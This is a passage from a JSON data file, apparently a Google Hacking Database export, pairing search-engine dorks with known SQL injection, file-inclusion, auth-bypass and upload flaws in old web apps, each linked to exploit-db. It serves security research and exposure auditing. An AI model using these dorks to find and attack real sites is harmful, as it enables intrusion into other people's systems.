Injection Vulnerability - CVE: 2008-5198: https://www.exploit-db.com/exploits/5969"}, {"dork": "inurl:index.php?option=com_mambads", "description": "Mambo Component com_mambads SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11719"}, {"dork": "inurl:\"modules.php?name=My_eGallery\"", "description": "PHP-Nuke My_eGallery 2.7.9 Remote SQL Injection Vulnerability - CVE: 2008-7038: https://www.exploit-db.com/exploits/5203"}, {"dork": "\"Marketplace Version 1.1.1\"", "description": "Joomla Component Marketplace 1.1.1 SQL Injection Vulnerability - CVE: 2008-0689: https://www.exploit-db.com/exploits/5055"}, {"dork": "\"Powered by Ajax Portal 3.0\"", "description": "MyioSoft Ajax Portal 3.0 (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5653: https://www.exploit-db.com/exploits/7044"}, {"dork": "\"Powered By IP.Board 3.0.0 Beta 5\"", "description": "Invision Power Board 3.0.0b5 Active XSS & Path Disclosure Vulns: https://www.exploit-db.com/exploits/8538"}, {"dork": "\"MunzurSoft Wep Portal W3\"", "description": "MunzurSoft Wep Portal W3 (kat) SQL Injection Vulnerability - CVE: 2008-4573: https://www.exploit-db.com/exploits/6725"}, {"dork": "Powered by Blox CMS from TownNews.com", "description": "Blox CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12729"}, {"dork": "allinurl :\"wp-content/plugins/st_newsletter\"", "description": "Wordpress Plugin st_newsletter Remote SQL Injection Vulnerability - CVE: 2008-0683: https://www.exploit-db.com/exploits/5053"}, {"dork": "\"\u00a9 2008 DevWorx - devworx.somee.com\"", "description": "TermiSBloG V 1.0 SQL Injection(s) Vulnerability: https://www.exploit-db.com/exploits/11081"}, {"dork": "inurl:\"links_showcat.php?\"", "description": "Dlili Script SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11318"}, {"dork": "Powered by SH-News 3.0", "description": "SH-News 3.0 (comments.php id) Remote SQL Injection Vulnerability - CVE: 2007-6391: https://www.exploit-db.com/exploits/4709"}, {"dork": "\"CaLogic Calendars V1.2.2\"", "description": "CaLogic Calendars 1.2.2 (langsel) Remote SQL Injection Vulnerability - CVE: 2008-2444: https://www.exploit-db.com/exploits/5607"}, {"dork": "inurl:\"com_pollxt\"", "description": "pollxt Mambo Component 1.22.07 Remote Include Vulnerability - CVE: 2006-5045: https://www.exploit-db.com/exploits/2029"}, {"dork": "Powered by PHP Links from DeltaScripts", "description": "PHP Links 1.3 (vote.php id) Remote SQL Injection Vulnerability - CVE: 2008-0565: https://www.exploit-db.com/exploits/5021"}, {"dork": "inurl:index.php?option=com_calendario", "description": "Joomla Component com_calendario Blind SQL injection Vulnerability: https://www.exploit-db.com/exploits/10760"}, {"dork": "Powered by PNphpBB2 / Powered por PNphpBB2", "description": "PNphpBB2 1.2g (phpbb_root_path) Remote File Include Vulnerability - CVE: 2006-4968: https://www.exploit-db.com/exploits/2390"}, {"dork": "\"Powered by Nukedit\"", "description": "Nukedit 4.9.8 Remote Database Disclosure Vulnerability - CVE: 2008-5773: https://www.exploit-db.com/exploits/7491"}, {"dork": "Powered by \"vcart 3.3.2\"", "description": "vcart 3.3.2 Multiple Remote File Inclusion Vulnerabilities - CVE: 2008-0287: https://www.exploit-db.com/exploits/4889"}, {"dork": "Powered by SkaLinks", "description": "SkaLinks 1.5 (Auth Bypass) SQL Injection Vulnerability - CVE: 2009-0451: https://www.exploit-db.com/exploits/7932"}, {"dork": "\"G\u00e9n\u00e9r\u00e9 par KDPics v1.18\"", "description": "G\u00e9n\u00e9r\u00e9 par KDPics v1.18 Remote Add Admin: https://www.exploit-db.com/exploits/11455"}, {"dork": "inurl:\"nabopoll/\"", "description": "nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability - CVE: 2005-2157: https://www.exploit-db.com/exploits/3315"}, {"dork": "allinurl :\"modules/eblog\"", "description": "eXV2 Module eblog 1.2 (blog_id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5253"}, {"dork": "Powered By DataLife Engine", "description": "DataLife Engine 8.2 dle_config_api Remote File Inclusion Vulnerability - CVE: 2009-3055: https://www.exploit-db.com/exploits/9572"}, {"dork": "\"\u00a9 Sabdrimer CMS\"", "description": "Sabdrimer PRO 2.2.4 (pluginpath) Remote File Include Vulnerability - CVE: 2006-3520: https://www.exploit-db.com/exploits/1996"}, {"dork": "AlstraSoft Web \"ESE\"", "description": "AlstraSoft Web Email Script Enterprise (id) SQL Injection Vuln - CVE: 2008-5751: https://www.exploit-db.com/exploits/7596"}, {"dork": "Powered by Maian Cart v1.1", "description": "Maian Cart 1.1 Insecure Cookie Handling Vulnerability: https://www.exploit-db.com/exploits/6047"}, {"dork": "Thyme 1. \u00c2\u00a9 2006 eXtrovert Software LLC. All rights reserved", "description": "Thyme 1.3 (export_to) Local File Inclusion Vulnerability - CVE: 2009-0535: https://www.exploit-db.com/exploits/8029"}, {"dork": "eXV2 MyAnnonces", "description": "eXV2 Module MyAnnonces (lid) Remote SQL Injection Vulnerability - CVE: 2008-1406: https://www.exploit-db.com/exploits/5252"}, {"dork": "\"BlogMe PHP created by Gamma Scripts\"", "description": "BlogMe PHP (comments.php id) SQL Injection Vulnerability - CVE: 2008-2175: https://www.exploit-db.com/exploits/5533"}, {"dork": "inurl:\"/go/_files/?file=\"", "description": "SOTEeSKLEP 3.5RC9 (file) Remote File Disclosure Vulnerability - CVE: 2007-4369: https://www.exploit-db.com/exploits/4282"}, {"dork": "inurl:\"option=com_camelcitydb2\"", "description": "Joomla CamelcityDB 2.2 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14530"}, {"dork": "Powered by PacerCMS", "description": "PacerCMS 0.6 (last_module) Remote Code Execution Vulnerability - CVE: 2007-5056: https://www.exploit-db.com/exploits/5098"}, {"dork": "inurl:com_expshop", "description": "Joomla Component EXP Shop (catid) SQL Injection Vulnerability - CVE: 2008-2892: https://www.exploit-db.com/exploits/5893"}, {"dork": "intitle:\"ITech Bids\"", "description": "ITechBids 5.0 (bidhistory.php item_id) Remote SQL Injection Vulnerability - CVE: 2008-0692: https://www.exploit-db.com/exploits/5056"}, {"dork": "\"Script r\u00e9alis\u00e9 par BinGo PHP\"", "description": "BinGo News 3.01 (bnrep) Remote File Include Vulnerability - CVE: 2006-4648: https://www.exploit-db.com/exploits/2312"}, {"dork": "Powered by CS-Cart - Shopping Cart Software", "description": "CS-Cart 1.3.3 (classes_dir) Remote File Include Vulnerability - CVE: 2006-2863: https://www.exploit-db.com/exploits/1872"}, {"dork": "inurl:com_colophon", "description": "Mambo Colophon Component 1.2 Remote Inclusion Vulnerability - CVE: 2006-3969: https://www.exploit-db.com/exploits/2085"}, {"dork": "\" Powered by JTL-Shop 2\"", "description": "JTL-Shop 2 (druckansicht.php) SQL Injection Vulnerability - CVE: 2010-0691: https://www.exploit-db.com/exploits/11445"}, {"dork": "\"Powered by PHP Shop from DeltaScripts\"", "description": "DeltaScripts PHP Shop 1.0 (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5648: https://www.exploit-db.com/exploits/7025"}, {"dork": "\"Powered by sNews \" inurl:index.php?id=", "description": "sNews (index.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14458"}, {"dork": "\"Torbstoff News 4\"", "description": "Torbstoff News 4 (pfad) Remote File Inclusion Vulnerability - CVE: 2006-4045: https://www.exploit-db.com/exploits/2121"}, {"dork": "intext:Powered by MX-System 2.7.3", "description": "MX-System 2.7.3 (index.php page) Remote SQL Injection Vulnerability - CVE: 2008-2477: https://www.exploit-db.com/exploits/5659"}, {"dork": "\"Powered By 4smart\"", "description": "Magician Blog 1.0 (Auth Bypass) SQL injection Vulnerability: https://www.exploit-db.com/exploits/9283"}, {"dork": "intext:\"Powered by Arcade Builder\"", "description": "ArcadeBuilder Game Portal Manager 1.7 Remote SQL Injection Vuln - CVE: 2007-3521: https://www.exploit-db.com/exploits/4133"}, {"dork": "inurl:\"index.php?id_menu=\"", "description": "CMScontrol 7.x File Upload: https://www.exploit-db.com/exploits/11104"}, {"dork": "Powered By Coppermine Photo Gallery v1.2.2b /Powered By Coppermine", "description": "Coppermine Photo Gallery 1.2.2b (Nuke Addon) Include Vulnerability: https://www.exploit-db.com/exploits/2375"}, {"dork": "\u00c2\u00a9 2005-2006 Powered by eSyndiCat Directory Software", "description": "eSyndiCat Directory Software Multiple SQL Injection Vulnerabilities - CVE: 2007-3811: https://www.exploit-db.com/exploits/4183"}, {"dork": "\"powered by Nabernet\"", "description": "Nabernet (articles.php) Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11482"}, {"dork": "\"Powered by VS PANEL 7.5.5\"", "description": "https://www.exploit-db.com/exploits/9171/ - CVE: 2009-3595"}, {"dork": "\"powered by easytrade\"", "description": "easyTrade 2.x (detail.php id) Remote SQL Injection Vulnerability - CVE: 2008-2790: https://www.exploit-db.com/exploits/5840"}, {"dork": "inurl:\"articles.php?topic=\"", "description": "jPORTAL 2.3.1 articles.php Remote SQL Injection Vulnerability - CVE: 2007-5973: https://www.exploit-db.com/exploits/4614"}, {"dork": "inurl:\"classifieds.php?op=detail_adverts\"", "description": "PHP-Fusion Mod classifieds (lid) Remote SQL Injection Vulnerability - CVE: 2008-5197: https://www.exploit-db.com/exploits/5961"}, {"dork": "\"Emefa Guestbook V 3.0\"", "description": "Emefa Guestbook 3.0 Remote Database Disclosure Vulnerability - CVE: 2008-5852: https://www.exploit-db.com/exploits/7534"}, {"dork": "powered by webit! cms", "description": "Webit Cms SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12744"}, {"dork": "\"wow roster version 1.*\"", "description": "WoW Roster 1.70 (/lib/phpbb.php) Remote File Include Vulnerability: https://www.exploit-db.com/exploits/2109"}, {"dork": "inurl:com_DTRegister eventId", "description": "Joomla Component DT Register Remote SQL injection Vulnerability - CVE: 2008-3265: https://www.exploit-db.com/exploits/6086"}, {"dork": "\"wow roster version 1.5.*\"", "description": "WoW Roster 1.5.1 (subdir) Remote File Include Vulnerability - CVE: 2006-3998: https://www.exploit-db.com/exploits/2099"}, {"dork": "Powered by free simple software", "description": "Free Simple Software v1.0 Remote File Inclusion Vulnerability - CVE: 2010-3307: https://www.exploit-db.com/exploits/14672"}, {"dork": "\"TR Newsportal\" brought by TRanx.", "description": "TR Newsportal 0.36tr1 (poll.php) Remote File Inclusion Vulnerability - CVE: 2006-2557: https://www.exploit-db.com/exploits/1789"}, {"dork": "Powered by Minerva 237", "description": "Minerva 2.0.8a Build 237 (phpbb_root_path) File Include Vulnerability - CVE: 2006-3028: https://www.exploit-db.com/exploits/1908"}, {"dork": "\"Powered By W3infotech\"", "description": "W3infotech ( Auth Bypass ) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10222"}, {"dork": "inurl:\"option=com_org\"", "description": "Joomla Component com_org SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11725"}, {"dork": "\"Powered by GameSiteScript\"", "description": "GameSiteScript 3.1 (profile id) Remote SQL Injection Vulnerability - CVE: 2007-3631: https://www.exploit-db.com/exploits/4159"}, {"dork": "Powered by: Con-Imedia", "description": "IMEDIA (index.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12665"}, {"dork": "(c) SriptBux 2008 | Powered By ScriptBux version 2.50 beta 1", "description": "Bux.to Clone Script Insecure Cookie Handling Vulnerability - CVE: 2008-6162: https://www.exploit-db.com/exploits/6652"}, {"dork": "\"powered by twg\"", "description": "TinyWebGallery 1.5 (image) Remote Include Vulnerabilities - CVE: 2006-4166: https://www.exploit-db.com/exploits/2158"}, {"dork": "allinurl:/phpress/", "description": "phpress 0.2.0 (adisplay.php lang) Local File Inclusion Vulnerability: https://www.exploit-db.com/exploits/4382"}, {"dork": "\"Powered by sendcard - an advanced PHP e-card program\" -site:sendcard.org", "description": "Sendcard 3.4.1 (sendcard.php form) Local File Inclusion Vulnerability - CVE: 2007-2471: https://www.exploit-db.com/exploits/3827"}, {"dork": "intext: \"Powered by Marinet\"", "description": "Marinet cms SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12575"}, {"dork": "UPublisher", "description": "UPublisher 1.0 (viewarticle.asp) Remote SQL Injection Vulnerability - CVE: 2006-5888: https://www.exploit-db.com/exploits/2765"}, {"dork": "intitle:\"Answer Builder\" Ask a question", "description": "Expert Advisior (index.php id) Remote SQL Injection Vulnerbility - CVE: 2007-3882: https://www.exploit-db.com/exploits/4189"}, {"dork": "inurl:\"tinybrowser.php?\"", "description": "TinyBrowser Remote File upload Vulnerability: https://www.exploit-db.com/exploits/12692"}, {"dork": "\"Powered by ECShop v2.5.0\"", "description": "ECShop 2.5.0 (order_sn) Remote SQL Injection Vulnerability - CVE: 2009-1622: https://www.exploit-db.com/exploits/8548"}, {"dork": "\"powered by Photo-Graffix Flash Image Gallery\"", "description": "Photo Graffix 3.4 Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/8372"}, {"dork": "\"inc_webblogmanager.asp\"", "description": "DMXReady Registration Manager 1.1 Arbitrary File Upload Vulnerability - CVE: 2009-2238: https://www.exploit-db.com/exploits/8749"}, {"dork": "inurl:tr.php?id=", "description": "Downline Goldmine Category Addon (id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6947"}, {"dork": "inurl:index.php?mod=jeuxflash", "description": "KwsPHP Module jeuxflash (cat) Remote SQL Injection Vulnerability - CVE: 2008-1759: https://www.exploit-db.com/exploits/5352"}, {"dork": "allinurl :\"modules/gallery\"", "description": "XOOPS Module Gallery 0.2.2 (gid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5241"}, {"dork": "intext:\"Design by MMA Creative\"", "description": "MMA Creative Design SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12706"}, {"dork": "inurl:tr.php?id=", "description": "Downline Goldmine Builder (tr.php id) Remote SQL Injection Vulnerability - CVE: 2008-4178: https://www.exploit-db.com/exploits/6946"}, {"dork": "''com_noticias''", "description": "Joomla Component com_noticias 1.0 SQL Injection Vulnerability - CVE: 2008-0670: https://www.exploit-db.com/exploits/5081"}, {"dork": "\"MobPartner Counter\" \"upload files\"", "description": "MobPartner Counter - Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/11019"}, {"dork": "allinurl: \"modules/glossaires\"", "description": "XOOPS Module Glossario 2.2 (sid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5216"}, {"dork": "inurl:com_netinvoice", "description": "Joomla Component netinvoice 1.2.0 SP1 SQL Injection Vulnerability - CVE: 2008-3498: https://www.exploit-db.com/exploits/5939"}, {"dork": "inurl:com_beamospetition", "description": "Joomla Component beamospetition Remote SQL Injection Vulnerability - CVE: 2008-3132: https://www.exploit-db.com/exploits/5965"}, {"dork": "\"com_lmo\"", "description": "Joomla LMO Component 1.0b2 Remote Include Vulnerability - CVE: 2006-3970: https://www.exploit-db.com/exploits/2092"}, {"dork": "\"Powered by Clicknet CMS\"", "description": "Clicknet CMS 2.1 (side) Arbitrary File Disclosure Vulnlerability - CVE: 2009-2325: https://www.exploit-db.com/exploits/9037"}, {"dork": "Igloo (interest group glue)", "description": "Igloo 0.1.9 (Wiki.php) Remote File Include Vulnerability - CVE: 2006-2819: https://www.exploit-db.com/exploits/1863"}, {"dork": "inurl:\"com_acstartseite\"", "description": "Joomla Component com_acstartseite Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11479"}, {"dork": "\"Powered by Populum\"", "description": "Populum 2.3 SQL injection vulnerability: https://www.exploit-db.com/exploits/11126"}, {"dork": "\"Powered by PWP Version 1-5-1\" AND inurl:\"/wiki/run.php\"", "description": "PWP Wiki Processor 1-5-1 Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/7740"}, {"dork": "intext:\"Design by BB Media.Org\"", "description": "BBMedia Design's SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12711"}, {"dork": "inurl:\"com_acprojects\"", "description": "Joomla Component com_acprojects Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11480"}, {"dork": "inurl:\"com_acteammember\"", "description": "Joomla Component com_acteammember SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11483"}, {"dork": "Powered by Maian Weblog v4.0", "description": "Maian Weblog 4.0 Insecure Cookie Handling Vulnerability - CVE: 2008-3318: https://www.exploit-db.com/exploits/6064"}, {"dork": "Powered by: Maian Recipe v1.2", "description": "Maian Recipe 1.2 Insecure Cookie Handling Vulnerability - CVE: 2008-3322: https://www.exploit-db.com/exploits/6063"}, {"dork": "Powered by: Maian Search v1.1", "description": "Maian Search 1.1 Insecure Cookie Handling Vulnerability - CVE: 2008-3317: https://www.exploit-db.com/exploits/6066"}, {"dork": "Powered by: Maian Links v3.1", "description": "Maian Links 3.1 Insecure Cookie Handling Vulnerability - CVE: 2008-3319: https://www.exploit-db.com/exploits/6062"}, {"dork": "Powered by: Maian Uploader v4.0", "description": "Maian Uploader 4.0 Insecure Cookie Handling Vulnerability - CVE: 2008-3321: https://www.exploit-db.com/exploits/6065"}, {"dork": "\"Powered By Steamcast \"0.9.75 beta", "description": "Steamcast 0.9.75b Remote Denial of Service: https://www.exploit-db.com/exploits/8429"}, {"dork": "Powered by Maian Guestbook v3.2", "description": "Maian Guestbook 3.2 Insecure Cookie Handling Vulnerability - CVE: 2008-3320: https://www.exploit-db.com/exploits/6061"}, {"dork": "inurl:acrotxt.php wbb", "description": "WBB2-Addon: Acrotxt v1 (show) Remote SQL Injection Vulnerability - CVE: 2007-4581: https://www.exploit-db.com/exploits/4327"}, {"dork": "Designed by:InterTech Co", "description": "InterTech Co 1.0 SQL Injection: https://www.exploit-db.com/exploits/11440"}, {"dork": "allinurl: cid\"modules/classifieds/index.php?pa=Adsview\"", "description": "XOOPS Module classifieds (cid) Remote SQL Injection Vulnerability - CVE: 2008-0873: https://www.exploit-db.com/exploits/5158"}, {"dork": "News powered by ashnews", "description": "ashNews 0.83 (pathtoashnews) Remote File Include Vulnerabilities - CVE: 2003-1292: https://www.exploit-db.com/exploits/1864"}, {"dork": "allinurl: \"modules MyAnnonces index php pa view\"", "description": "RunCMS Module MyAnnonces (cid) SQL Injection Vulnerability - CVE: 2008-0878: https://www.exploit-db.com/exploits/5156"}, {"dork": "\"News Managed by Ditto News\"", "description": "Xtreme/Ditto News 1.0 (post.php) Remote File Include Vulnerability: https://www.exploit-db.com/exploits/1887"}, {"dork": "Coded By WebLOADER", "description": "Webloader v7 - v8 ( vid ) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12647"}, {"dork": "\"Powered by Philboard\" inurl:\"philboard_forum.asp\"", "description": "Philboard 1.14 (philboard_forum.asp) SQL Injection Vulnerability - CVE: 2007-0920: https://www.exploit-db.com/exploits/3295"}, {"dork": "inurl:\"com_jjgallery", "description": "Joomla Component Carousel Flash Image Gallery RFI Vulnerability - CVE: 2007-6027: https://www.exploit-db.com/exploits/4626"}, {"dork": "intext:\"jPORTAL 2\" inurl:\"mailer.php\"", "description": "jPORTAL 2 mailer.php Remote SQL Injection Vulnerability - CVE: 2007-5974: https://www.exploit-db.com/exploits/4611"}, {"dork": "inurl:CuteSoft_Client/CuteEditor", "description": "Cute Editor ASP.NET Remote File Disclosure Vulnerability - CVE: 2009-4665: https://www.exploit-db.com/exploits/8785"}, {"dork": "Actionn\u00c3\u0192\u00c2\u00a9e par smartblog", "description": "Smartblog (index.php tid) Remote SQL Injection Vulnerability - CVE: 2008-2185: https://www.exploit-db.com/exploits/5535"}, {"dork": "inurl:tr.php?id=", "description": "Downline Goldmine newdownlinebuilder (tr.php id) SQL Injection Vuln: https://www.exploit-db.com/exploits/6951"}, {"dork": "inurl:tr.php?id=", "description": "Downline Goldmine paidversion (tr.php id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6950"}, {"dork": "allintext:\"Browse Blogs by Category\"", "description": "Blog System 1.x (index.php news_id) Remote SQL Injection Vulnerability - CVE: 2007-3979: https://www.exploit-db.com/exploits/4206"}, {"dork": "inurl:option=com_mydyngallery", "description": "Joomla Component mydyngallery 1.4.2 (directory) SQL Injection Vuln - CVE: 2008-5957: https://www.exploit-db.com/exploits/7343"}, {"dork": "inurl:index.php?mod=sondages", "description": "KwsPHP 1.0 sondages Module Remote SQL Injection Vulnerability - CVE: 2007-4979: https://www.exploit-db.com/exploits/4422"}, {"dork": "inurl:\"tr1.php?id=\" Forced Matrix", "description": "YourFreeWorld Forced Matrix Script (id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6939"}, {"dork": "allintext:\"SuperCali Event Calendar\"", "description": "SuperCali PHP Event Calendar 0.4.0 SQL Injection Vulnerability - CVE: 2007-3582: https://www.exploit-db.com/exploits/4141"}, {"dork": "inurl:\"com_ckforms\"", "description": "Joomla Component (com_ckforms) Local File Inclusion Vulnerability: https://www.exploit-db.com/exploits/15453"}, {"dork": "inurl:\"com_prayercenter\"", "description": "Joomla Component prayercenter 1.4.9 (id) SQL Injection Vulnerability - CVE: 2008-6429: https://www.exploit-db.com/exploits/5708/"}, {"dork": "ADP Forum 2.0.3 is powered by VzScripts", "description": "Vz (Adp) Forum 2.0.3 Remote Password Disclosure Vulnerablity - CVE: 2006-6891: https://www.exploit-db.com/exploits/3053"}, {"dork": "inurl:\"com_ccnewsletter\"", "description": "Joomla Component com_ccnewsletter LFI Vulnerability - CVE: 2010-0467: https://www.exploit-db.com/exploits/11282"}, {"dork": "inurl:\"add_soft.php\"", "description": "Software Index 1.1 (cid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5378"}, {"dork": "pages.php?id= \"Multi Vendor Mall\"", "description": "Multi Vendor Mall (itemdetail.php & shop.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12755"}, {"dork": "\"Search Affiliate Programs:\"", "description": "Affiliate Directory (cat_id) Remote SQL Injection Vulnerbility: https://www.exploit-db.com/exploits/5363"}, {"dork": "intitle:\"Dacio's Image Gallery\"", "description": "Dacio's Image Gallery 1.6 (DT/Bypass/SU) Remote Vulnerabilities: https://www.exploit-db.com/exploits/8653"}, {"dork": "\"Website by Spokane Web Communications\"", "description": "ArticleLive (Interspire Website Publisher) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12526"}, {"dork": "\"powered by: elkagroup\"", "description": "elkagroup SQL Injection Vulnerability - CVE: 2009-4569: https://www.exploit-db.com/exploits/10330"}, {"dork": "allinurl:/myspeach/", "description": "MySpeach 3.0.2 (my_ms[root]) Remote File Include Vulnerability - CVE: 2006-4630: https://www.exploit-db.com/exploits/2301"}, {"dork": "Powered by Revsense", "description": "RevSense (Auth bypass) Remote SQL Injection Vulnerability - CVE: 2008-6309: https://www.exploit-db.com/exploits/7163"}, {"dork": "724CMS Powered, 724CMS Version 4.59. Enterprise", "description": "724CMS Enterprise Version 4.59 SQL Injection Vulnerability - CVE: 2008-1858: https://www.exploit-db.com/exploits/12560"}, {"dork": "index.php?option=com_facileforms", "description": "Joomla Component com_facileforms 1.4.4 RFI Vulnerability - CVE: 2008-2990: https://www.exploit-db.com/exploits/5915"}, {"dork": "Powered By phUploader", "description": "phUploader Remote File Upload Vulnerability - CVE: 2007-4527: https://www.exploit-db.com/exploits/10574"}, {"dork": "inurl:\"myLDlinker.php\"", "description": "WordPress Plugin myLDlinker SQL Injection Vulnerability - CVE: 2010-2924: https://www.exploit-db.com/exploits/14441"}, {"dork": "inurl:com_idoblog", "description": "Joomla Component iDoBlog b24 Remote SQL Injection Vulnerability - CVE: 2008-2627: https://www.exploit-db.com/exploits/5730"}, {"dork": "/modules/xhresim/", "description": "XOOPS Module xhresim (index.php no) Remote SQL Injection Vuln - CVE: 2008-5665: https://www.exploit-db.com/exploits/6748"}, {"dork": "\"Powered by FubarForum v1.5\"", "description": "FubarForum 1.5 (index.php page) Local File Inclusion Vulnerability - CVE: 2008-2887: https://www.exploit-db.com/exploits/5872"}, {"dork": "/modules/amevents/print.php?id=", "description": "XOOPS Module Amevents (print.php id) SQL Injection Vulnerability - CVE: 2008-5768: https://www.exploit-db.com/exploits/7479"}, {"dork": "allinurl: com_gallery \"func\"", "description": "Mambo Component com_gallery Remote SQL Injection Vulnerability - CVE: 2008-0746: https://www.exploit-db.com/exploits/5084"}, {"dork": "\"pForum 1.29a\" OR \"\"Powie's PSCRIPT Forum 1.26\"", "description": "Powies pForum 1.29a (editpoll.php) SQL Injection Vulnerability - CVE: 2006-6038: https://www.exploit-db.com/exploits/2797"}, {"dork": "allinurl: \"/modules/myTopics/\"", "description": "XOOPS Module myTopics (articleid) Remote SQL Injection Vulnerability - CVE: 2008-0847: https://www.exploit-db.com/exploits/5148"}, {"dork": "inurl:\"com_ckforms\"", "description": "Joomla Component com_ckforms Multiple Vulnerabilities - CVE: 2010-1344: https://www.exploit-db.com/exploits/11785"}, {"dork": "allinurl:\"index.php?site=\" \"W-Agora\"", "description": "w-Agora 4.2.1 (cat) Remote SQL Injection Vulnerability - CVE: 2007-6647: https://www.exploit-db.com/exploits/4817"}, {"dork": "inurl:\"index.php?m_id=\"", "description": "slogan design Script SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12849"}, {"dork": "Powered by MVC-Web CMS inurl:/index.asp?newsid=", "description": "MVC-Web CMS 1.0/1.2 (index.asp newsid) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5912"}, {"dork": "allinurl: \"showCat.php?cat_id\"", "description": "D.E. Classifieds (cat_id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5291"}, {"dork": "\"PhpLinkExchange v1.02\"", "description": "PhpLinkExchange v1.02 - XSS/Upload Vulerability - CVE: 2008-3679: https://www.exploit-db.com/exploits/10495"}, {"dork": "\"ClanSys v.1.1\"", "description": "Clansys v.1.1 (index.php page) PHP Code Insertion Vulnerability - CVE: 2006-2005: https://www.exploit-db.com/exploits/1710"}, {"dork": "inurl:inc_accountlistmanager.asp", "description": "DMXReady Account List Manager 1.1 Contents Change Vulnerability: https://www.exploit-db.com/exploits/7754"}, {"dork": "inurl:com_jomestate", "description": "Joomla Hot Property com_jomestate RFI Vulnerability: https://www.exploit-db.com/exploits/13956"}, {"dork": "\"Members Statistics\" +\"Total Members\" +\"Guests Online\"", "description": "AR Memberscript (usercp_menu.php) Remote File Include Vulnerability - CVE: 2006-6590: https://www.exploit-db.com/exploits/2931"}, {"dork": "\"Copyright Interactivefx.ie\"", "description": "Interactivefx.ie CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11873"}, {"dork": "inurl:tr.php?id= Hosting", "description": "YourFreeWorld Classifieds Hosting (id) SQL Injection Vulnerability - CVE: 2008-4884: https://www.exploit-db.com/exploits/6948"}, {"dork": "allinur:com_extended_registration", "description": "Mambo com_registration_detailed 4.1 Remote File Include - CVE: 2006-5254: https://www.exploit-db.com/exploits/2379"}, {"dork": "inurl:com_rapidrecipe \"recipe_id\"", "description": "Joomla Component rapidrecipe Remote SQL injection Vulnerability - CVE: 2008-2697: https://www.exploit-db.com/exploits/5759"}, {"dork": "\"Powered by SoftbizScripts\" \"OUR SPONSORS\"", "description": "Softbiz Link Directory Script Remote SQL Injection Vulnerability - CVE: 2007-5996: https://www.exploit-db.com/exploits/4620"}, {"dork": "Powered by PowerPortal v1.3a", "description": "PowerPortal 1.3a (index.php) Remote File Include Vulnerability - CVE: 2006-5126: https://www.exploit-db.com/exploits/2454"}, {"dork": "\"powered by kure\"", "description": "Kure 0.6.3 (index.php post,doc) Local File Inclusion Vulnerability - CVE: 2008-4632: https://www.exploit-db.com/exploits/6767"}, {"dork": "\"Liberum Help Desk, Copyright (C) 2001 Doug Luxem\"", "description": "Liberum Help Desk 0.97.3 (SQL/DD) Remote Vulnerabilities - CVE: 2008-6057: https://www.exploit-db.com/exploits/7493"}, {"dork": "inurl:modules.php?name=Shopping_Cart", "description": "PHP-Nuke Module Emporium 2.3.0 (id_catg) SQL Injection Vulnerability - CVE: 2007-1034: https://www.exploit-db.com/exploits/10615"}, {"dork": "intext:\"powered by itaco group\"", "description": "ITaco Group ITaco.biz (view_news) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11012"}, {"dork": "mediaHolder.php?id", "description": "WordPress Media Holder (mediaHolder.php id) SQL Injection Vuln: https://www.exploit-db.com/exploits/6842"}, {"dork": "\"powered by seditio\" OR \"powered by ldu\"", "description": "Seditio CMS v121 (pfs.php) Remote File Upload Vulnerability - CVE: 2007-4057: https://www.exploit-db.com/exploits/4235"}, {"dork": "Powered By AJ Auction", "description": "AJ Auction v1 (id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5868"}, {"dork": "\"Powered by Content Injector v1.52\"", "description": "Content Injector 1.52 (index.php cat) Remote SQL Injection Vulnerability - CVE: 2007-6137: https://www.exploit-db.com/exploits/4645"}, {"dork": "Events Calendar 1.1", "description": "Events Calendar 1.1 Remote File Inclusion Vulnerability - CVE: 2008-4673: https://www.exploit-db.com/exploits/6623"}, {"dork": "inurl:inc_linksmanager.asp", "description": "DMXReady Links Manager 1.1 Remote Contents Change Vulnerability: https://www.exploit-db.com/exploits/7772"}, {"dork": "inurl:/index.php?option=com_otzivi", "description": "Joomla Component com_otzivi Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10966"}, {"dork": "\"Powered by DigitalHive\"", "description": "DigitalHive 2.0 RC2 (base_include.php) Remote Include Vulnerability - CVE: 2006-5493: https://www.exploit-db.com/exploits/2566"}, {"dork": "inurl:\"com_casino_blackjack\"", "description": "Joomla Casino 0.3.1 Multiple SQL Injection - CVE: 2009-2239: https://www.exploit-db.com/exploits/8743"}, {"dork": "inurl:\"/tagit2b/\"", "description": "TagIt! Tagboard 2.1.b b2 (index.php) Remote File Include Vulnerability - CVE: 2006-5093: https://www.exploit-db.com/exploits/2450"}, {"dork": "\"powered by LionWiki \"", "description": "LionWiki 3.X 